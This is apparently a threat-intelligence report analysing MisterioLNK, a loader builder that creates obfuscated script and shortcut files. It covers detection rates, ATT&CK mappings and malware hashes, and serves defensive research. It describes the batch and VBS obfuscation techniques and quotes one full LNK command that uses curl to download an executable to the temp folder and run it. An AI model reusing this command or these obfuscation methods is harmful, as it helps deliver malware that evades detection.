Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.
As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while employing obfuscation as well. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.
Key features of MisterioLNK include support for five loader methods—HTA, BAT, CMD, VBS, and LNK— as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.
The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.
Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, and BlankStealer. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.
For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.
Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.
The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.
The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”
The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.
The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.
The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:\Windows\system32\cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%\ntvy4adp.exe & start /b %temp%\ntvy4adp.exe”. The figure below shows the properties of the LNK file.
Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.
MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.
Tactic | Technique | Procedure |
Execution (TA0002) | User Execution: Malicious File (T1204.002) | MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file. |
Execution (TA0002) | Command and Scripting Interpreter (T1059) | Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system. |
Execution (TA0002) | Command and Scripting Interpreter: Visual Basic (T1059.005) | Deploys obfuscated VBScript files that execute commands to download and run additional payloads. |
Execution (TA0002) | Command and Scripting Interpreter: Visual Basic (T1059.003) | Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution. |
Defence Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction. |
Defence Evasion (TA0005) | Obfuscated Files or Information: Command Obfuscation (T1027.010) | MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult. |
Defence Evasion (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTP/S through the curl command to communicate with remote servers to download payloads. |
Indicator | Indicator Type | Description |
3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17 | SHA256 | Remcos |
dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850 | SHA256 | Remcos |
1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5f | SHA256 | Remcos |
64fd11a9befea1310503336a6a8194fca7ab7af291562787c4985d1a1f06b4e1 | SHA256 | Remcos |
0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601 | SHA256 | DC RAT |
7f8737e14ca51c1724c0f65a568cefa4d9e1536416ddf89569eab2cce8ae2e01 | SHA256 | BlankStealer |